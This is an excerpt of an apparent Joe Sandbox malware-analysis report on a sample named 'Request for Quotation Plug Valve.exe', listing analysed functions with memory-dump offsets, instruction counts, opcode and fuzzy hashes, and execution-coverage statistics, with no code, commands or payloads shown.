Instruction ID: 0c7257259302d344fad4246175a5e8dafad17d6b5a25e4d03d8da3d3178c0cfa
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 9D11E676504280CFCB16CF10D5C4B16BF71FB94318F24C6A9E8490B656C33AD856CBA1

Function 00A3D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: c7b1fcdcd414c8c4563eb384fa6e19631b106e6f4423d6a5f0e845047eaf32a3
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 1E11E6B6504280DFCF16CF10E5C4B16BF71FB94324F24C6A9E8490B656C33AE856CBA1

Function 00A4D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 461759bf9084614ba5d68b88b1c4dfbe05792de681e6f746128f30cd4a6f9683
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 06119D79504284DFCB15CF14D5C4B15FBA2FB84318F24C6AED84A4B656C33AD84ACBA2

Function 00A4D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 1b3d1dd02b4ac64760593855b3de0a87a3c9e9a0d4d40c1e8e652f73e0c78cbe
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 2C119DB9504284DFCB15CF10D5C4B55FBB1FB84314F24C6ADD8494B6A6C37AD84ACB61

Function 00A3D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adcb06670da18dab7fc97ce0705c2ee12a5b85f413850066e45696c7ec79b775
Instruction ID: 530aa47ae666f48d16136e45c97bb1b49419ee5a428966a85914e1434570a647
Opcode Fuzzy Hash: adcb06670da18dab7fc97ce0705c2ee12a5b85f413850066e45696c7ec79b775
Instruction Fuzzy Hash: 67012671404340DAE7104F25EDC4B67BFA8EF41364F18C51AFE080E296C6B99840CAB1

Function 00A3D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42f94abaa26406407a012d9554aad9785c0c91c6f3695389c5c06e8d8fdb0f5
Instruction ID: 7aee3670b08d8071b3b6c807180d4b1e4fd6437692dc37fa05a65f4ca6296e99
Opcode Fuzzy Hash: e42f94abaa26406407a012d9554aad9785c0c91c6f3695389c5c06e8d8fdb0f5
Instruction Fuzzy Hash: 82F06D72405344AEE7108F16D9C8B66FF98EB91734F18C45AFD084E296C279A844CBB1

Analysis Process: Request for Quotation Plug Valve.exePID: 6456, Parent PID: 6620COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	75.8%
Total number of Nodes:	33
Total number of Limit Nodes:	6

Executed Functions

Function 068E5028 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 068E8408

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: f5923a316392a58a2381163d9d8bd052949db8493fc08c49dced93e8d5b8f505
Instruction ID: 4b985ee62beb50c64821348efb3ac1b6393115a7ed55be506eac33ce0846bf70
Opcode Fuzzy Hash: f5923a316392a58a2381163d9d8bd052949db8493fc08c49dced93e8d5b8f505
Instruction Fuzzy Hash: D073F431D1075A8EDB11EF68C854A9DF7B1FF9A300F11D69AE44867221EB70AAC5CF81

Function 068E9C18 Relevance: 2.3, Instructions: 2263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f4c5bfb6f5a9649ae40268b6f5f083ec631b1a2f8803f5bcba7115a230133c
Instruction ID: c9b417b3da0262780fcac4cd495ed8817152b4cc4e92c7688e887c0b24595404
Opcode Fuzzy Hash: 44f4c5bfb6f5a9649ae40268b6f5f083ec631b1a2f8803f5bcba7115a230133c
Instruction Fuzzy Hash: FF33F430C146598EDB51EFA8C894A9DF7B1FF99300F10D69AD458B7221EB70AAC5CF81

Function 068E9548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21416727f10c0a661f7b940d07a245f759ba5ebb68aee8bb74b8bbfd527c848d
Instruction ID: 0ac1eef3cad02850bf0890383d3026f9ba20804c649122a445f4ac9f74b8dfd4
Opcode Fuzzy Hash: 21416727f10c0a661f7b940d07a245f759ba5ebb68aee8bb74b8bbfd527c848d
Instruction Fuzzy Hash: 16F10874D00228CFDB54DFA9D884B9DFBB2BF89304F1482A9D848AB355DB719986CF50

Function 02ABA088 Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65807079cb92bb665269e20334f3d21569a2d195623cac17442817fc02d2ee95
Instruction ID: e5cd3f4f1c634280e0954aa7087fa0050b029a937cb8cb077fe19389053bf4d9
Opcode Fuzzy Hash: 65807079cb92bb665269e20334f3d21569a2d195623cac17442817fc02d2ee95
Instruction Fuzzy Hash: F9827035A00209DFCB16CFA8C584AEEBBF6FF49314F158559E4059B2A7DB70E981CB60

Function 068E0B30 Relevance: .7, Instructions: 709
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca329430b1dff49e8abd0bd889a6b8152d1c6997cb60340c554dfe65973d47d9
Instruction ID: 127906eac873710e2882291985a15661cce3c181fe49a674e03612d9ca39b35a
Opcode Fuzzy Hash: ca329430b1dff49e8abd0bd889a6b8152d1c6997cb60340c554dfe65973d47d9
Instruction Fuzzy Hash: D572ED74E002698FDB64DF69C984BEDBBB2BB4A304F1481E9D449A7365DB709E81CF40

Function 02AB69A0 Relevance: .5, Instructions: 510
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e904e01f14eed7eed363aa6b4920f47331e10d47276d6106effda8aa4ebefc
Instruction ID: 460f9a067e610eb47e6725c88cf1e622974aa1abbf13e9f005f047f90c11c385
Opcode Fuzzy Hash: d9e904e01f14eed7eed363aa6b4920f47331e10d47276d6106effda8aa4ebefc
Instruction Fuzzy Hash: 13129E70A002198FDB19DF69C894BAEBBFAFF88714F148129E5059B396DF709D41CB90

Function 02AB7118 Relevance: .3, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05a78bb0492955a9b1468ac7373f90297980167a10ad8fda1be2faa2cb20a76c
Instruction ID: b700c5f57301443992cb2008316fbb7755f03c49ec4592efa527d2e03c8f4d8a
Opcode Fuzzy Hash: 05a78bb0492955a9b1468ac7373f90297980167a10ad8fda1be2faa2cb20a76c
Instruction Fuzzy Hash: 95E14F32A00115DFCB16CFA9CD84AEDFBB6BF88305F558165E805AB266DB70ED41CB50

Function 068E2968 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b9e5988c63e9fb70fc1d1ec98df361e97851f3e47921b55bf7cf718a4c0924
Instruction ID: 02441e370b8d1fb3318077bc886921a2fdd8d84025cdcc7bd26eaf78846beae2
Opcode Fuzzy Hash: c6b9e5988c63e9fb70fc1d1ec98df361e97851f3e47921b55bf7cf718a4c0924
Instruction Fuzzy Hash: 71C1B078E01218CFEB54DFA5D994B9DBBB2BF89300F1090A9D809AB355DB359E81CF50

Function 068E1E80 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2fcbfcf71cc7d0510f3ce9b25c5f7eb3164f54e8024abdccff4faae11dd14a
Instruction ID: 845951ca28afec5f8be4a66852891bd3fc5367299a7c1ec4c0d3168da4da36fb
Opcode Fuzzy Hash: 4a2fcbfcf71cc7d0510f3ce9b25c5f7eb3164f54e8024abdccff4faae11dd14a
Instruction Fuzzy Hash: EAA1A174E01228CFEB68CF6AC954B9DFBF2BB89300F14C1AAD408A7254DB745A85CF50

Function 068E2DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2bc70b3d90f1d220cf2f76e584ce5c55ab4e27d1194d75c45c5a08b9505454
Instruction ID: 1430f98945b2d51c9fefd808d0e081652a8e1ee49266caba661b826aafb62f01
Opcode Fuzzy Hash: 5d2bc70b3d90f1d220cf2f76e584ce5c55ab4e27d1194d75c45c5a08b9505454
Instruction Fuzzy Hash: EBA12474D00208CFEB24DFA9C858BDDBBB1FF89314F209269E508A72A1DB759985CF50

Function 068E17A0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fdbfcf25e5a01659b2bd8e01ebe3a11f53b0c84e36e5a94811693f869c045cd
Instruction ID: e92ce37615805e21f0893f891abd9cdf786b7d37addc104f0166b72b10187f84
Opcode Fuzzy Hash: 0fdbfcf25e5a01659b2bd8e01ebe3a11f53b0c84e36e5a94811693f869c045cd
Instruction Fuzzy Hash: DCA1A174E012298FEB68DF6AC944B9DFBF2BF89300F14C1AAD448A7254DB745A85CF50

Function 068E2DBF Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af0a04436bdefca7e28456bcae3000ba21d1269d822d85654ee08e78410ccfe
Instruction ID: b0cfdba552c12d50569cbd0439c83c5499a9303bd00e6f75d460d85812897205
Opcode Fuzzy Hash: 1af0a04436bdefca7e28456bcae3000ba21d1269d822d85654ee08e78410ccfe
Instruction Fuzzy Hash: F2A11474D00208CFEB14DFA9C994BEDBBB1FF89304F209269E509A72A1DB759985CF50

Function 068E310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f014f58dac73795a53c39b88573cd41bfe165e08b0774639c432fa8019d4d5e
Instruction ID: 52c6c5c27a1adfcd8e9f1827a4b8e439d22535c052e1c6d3c938417e3a90bc9c
Opcode Fuzzy Hash: 2f014f58dac73795a53c39b88573cd41bfe165e08b0774639c432fa8019d4d5e
Instruction Fuzzy Hash: 6F910374D00218CFEB50DFA8C898BECBBB1FF49314F209269E509AB291DB759985CF10

Function 02AB5362 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6870ea2472584819292406ffaeebfb0de19ad473a57afcf32b612d64ceb84606
Instruction ID: 0dbbfed14e00b983590529d838964cc10757706321208f95787aa6e189efaeeb
Opcode Fuzzy Hash: 6870ea2472584819292406ffaeebfb0de19ad473a57afcf32b612d64ceb84606
Instruction Fuzzy Hash: 1191F474E00218CFDB19DFAAD984ADDBBF2BF89300F548169D418AB365DB709981CF50

Function 02ABC468 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98ca3a31a9b2f370a357b78d0559e64397118ae1edb5101dc464bd6524d5ae1f
Instruction ID: 768f2ed500511c72921602873b44457448678c9ffce8248b02554b0682501fc1
Opcode Fuzzy Hash: 98ca3a31a9b2f370a357b78d0559e64397118ae1edb5101dc464bd6524d5ae1f
Instruction Fuzzy Hash: 1081D374E00218CFDB19DFA9D994B9DBBF2BF88310F14916AE418AB365DB709981CF50

Function 02ABCA08 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78cec79cec334a92b7ff2ba41813256285694d9e779ae891976b71a4582028ce
Instruction ID: 2f7d05eb3df11f79a7ff8cc8c18253da17911559cc38211b50dc022098d59cf6
Opcode Fuzzy Hash: 78cec79cec334a92b7ff2ba41813256285694d9e779ae891976b71a4582028ce
Instruction Fuzzy Hash: A681E574E00218DFDB19DFAAD884A9DBBF6BF89310F14C06AD418AB365DB309981CF50

Function 02ABD278 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e2a9f7c61a32fe63d8847f627d6772ffa1cd1286ba56f4571499d0a84954e0
Instruction ID: 0c74c1040bb59de45e1969bbb1dd43f449e6014e9cb1cbdaa465132ae5c003c4
Opcode Fuzzy Hash: f6e2a9f7c61a32fe63d8847f627d6772ffa1cd1286ba56f4571499d0a84954e0
Instruction Fuzzy Hash: 8081D574E00618CFDB19DFAAD984A9DBBF6BF88300F14C069D419AB365DB309981CF10

Function 02ABC19E Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b50cb8eaef8ceaed17149742f42c7c5be060856b46db9a9d56d8db9fc50ab5
Instruction ID: 2b5a31fcdc7c9c9b72d104f266a1a5725d1dba024326bbe533a1d0650c2cefe1
Opcode Fuzzy Hash: c1b50cb8eaef8ceaed17149742f42c7c5be060856b46db9a9d56d8db9fc50ab5
Instruction Fuzzy Hash: 7881D774E00218CFDB15DFA9D984A9DFBF6BF89310F14806AE419AB365DB709981CF50

Function 02ABC738 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8cc4c46bae99eb9400410bf1e3de51b56f8a110f90bad1e64eb4dcc019abfe
Instruction ID: b8005e17706d653124046f18f449971f881d2bc617d546fda99d18c3e44715ab
Opcode Fuzzy Hash: 2a8cc4c46bae99eb9400410bf1e3de51b56f8a110f90bad1e64eb4dcc019abfe
Instruction Fuzzy Hash: A781B574E00218CFEB59DFAAD984B9DBBF6BF88310F14806AD419AB365DB709941CF50

Function 02ABCCD8 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71aacc8aaabaeb10d810592d3fcfe5b3adeb5f2858323efef63913558f633591
Instruction ID: 3ed47d3d8f097aab77ed9b57c1d5de8f7e8b3725d6fccfa06590b25bb31ea9b9
Opcode Fuzzy Hash: 71aacc8aaabaeb10d810592d3fcfe5b3adeb5f2858323efef63913558f633591
Instruction Fuzzy Hash: 7E81D574E00218DFDB19DFA9D984A9DBBF2BF88314F14C06AE419AB365DB705981CF50

Function 02ABCFAA Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee80d4d345a120c0e5ecaea56ad878c79b28b17bb13cb6df250608bb25001ca
Instruction ID: 47f81e4fa744799553a5024e71d0357fbd5808dbcd2dddc8d3c2660a7d31f033
Opcode Fuzzy Hash: 4ee80d4d345a120c0e5ecaea56ad878c79b28b17bb13cb6df250608bb25001ca
Instruction Fuzzy Hash: 1181E574E00658CFDB59DFAAD984B9DBBF6BF88300F148069E419AB365DB309985CF10

Function 068E0B20 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6449688428ace0dd9dee89b7b5b8fe6b6c675bdadb1076d8d0ad7def7355a70d
Instruction ID: d9f89c3ce548f882551000823a392a50d32c38852470b01c673dfeaf802bef71
Opcode Fuzzy Hash: 6449688428ace0dd9dee89b7b5b8fe6b6c675bdadb1076d8d0ad7def7355a70d
Instruction Fuzzy Hash: DE71C175E01228CFDB68DF6AC9847DDBBB2BF89301F1495AAD409A7254DB345A81CF40

Function 068E178F Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6e0f8b3b1f94868e6f736519179978e2ce9fff065077bf26581c2a2e0fb80b
Instruction ID: 52a4a6da2cb8ab18d04588b94b9826ec2bbfed4acec7c3d064304b3144409029
Opcode Fuzzy Hash: 1a6e0f8b3b1f94868e6f736519179978e2ce9fff065077bf26581c2a2e0fb80b
Instruction Fuzzy Hash: 85719475E016298FEB68CF6AC944B9DFBF2BF89300F14C1A9D548A7254DB744A85CF10

Function 02ABE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30caf294daefe25c9ee16d4178c70715e1accc18ed4be3814564212a20019e55
Instruction ID: 29642248b23652621cf5e6482710868abe5468ab8f18ea07999d69bb338e1c9c
Opcode Fuzzy Hash: 30caf294daefe25c9ee16d4178c70715e1accc18ed4be3814564212a20019e55
Instruction Fuzzy Hash: 0851A474E00208DFEB19DFBAD994A9DBBF6BF89300F249129E815AB365DB705941CF10

Function 02ABE97A Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab304c9f21dff4b27a2348096c71aa6c4e6bd5ff6c0029a7ec9dfa306239fa58
Instruction ID: c8d23f4958edb5b46344bdef7f8707073b4077d9d866e316fa86e9de9f61fd90
Opcode Fuzzy Hash: ab304c9f21dff4b27a2348096c71aa6c4e6bd5ff6c0029a7ec9dfa306239fa58
Instruction Fuzzy Hash: B451A474E00208DFEB19DFBAD994A9DBBB6BF89300F249029E815AB365DB705941CF14

Function 068E1E70 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 551f94f4a0c86042c422b7d73816cad88cad3c7e315a094763390e6630fcd6a0
Instruction ID: 26f81a8d415a6654501748f4c4120503c2c6bbb3d811595f05bddb0fd3d90f33
Opcode Fuzzy Hash: 551f94f4a0c86042c422b7d73816cad88cad3c7e315a094763390e6630fcd6a0
Instruction Fuzzy Hash: 1A417871E016188BEB68CF6BD95478EFAF3AFC9204F14C1AAC40CA6254EB740A858F51

Function 068E295B Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6133d55b7ebf28a6ad9f788f3e88afec407b137a3f43f4f68ab91b13eda0ad2
Instruction ID: e284268e373d7d2e06883612ea844e07fe595a4d60ba3b20d2cbfe260d152083
Opcode Fuzzy Hash: b6133d55b7ebf28a6ad9f788f3e88afec407b137a3f43f4f68ab91b13eda0ad2
Instruction Fuzzy Hash: 66410475E01248CBEB58DFAAD8547ADFBB2BF89300F24D12AD415A7258DB344A45CF40

Function 068E992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 068E9A6E

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17c853886d7d52726a145e7ee51fb8126785f02edb43582fceeeef77fe8ff516
Instruction ID: 6356ea26958d8be4c212263fc065470b54d304964bbd6ffd11287498696d7f2f
Opcode Fuzzy Hash: 17c853886d7d52726a145e7ee51fb8126785f02edb43582fceeeef77fe8ff516
Instruction Fuzzy Hash: AA115974E402198FEF44DBA8D884AADBBB5BF89314F148265E844E7255DBB0D942CB50

Function 02ABE007 Relevance: .7, Instructions: 652
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0800e05ba4916d4a7b99d4cba9838f4699ec9010fbe0ff878db961be4a24c079
Instruction ID: 3af96f7823d888bd81e1a900793e7af58b8194d352587e9d8ccfd07fbeaf5fe3
Opcode Fuzzy Hash: 0800e05ba4916d4a7b99d4cba9838f4699ec9010fbe0ff878db961be4a24c079
Instruction Fuzzy Hash: 3512AA350312568FB6643B22E2AE16ABF69FB0F323704BE11F11AC01859FB544DACF61

Function 02ABE018 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8836b348f9b3072746c85323d874d0870b41ef6e89c4789337a648a213ff69
Instruction ID: edf4455febe40ee4fca68caaf97ada38da6bec4e65f7fc3b17d17b2974743234
Opcode Fuzzy Hash: ab8836b348f9b3072746c85323d874d0870b41ef6e89c4789337a648a213ff69
Instruction Fuzzy Hash: 34129A350312569FB6643B22A2AE16ABF69FB0F323704BE11F11AC01859FB544DACF61

Function 02AB0C8F Relevance: .5, Instructions: 543
COMMON

Download Yara Rule

Control-flow Graph

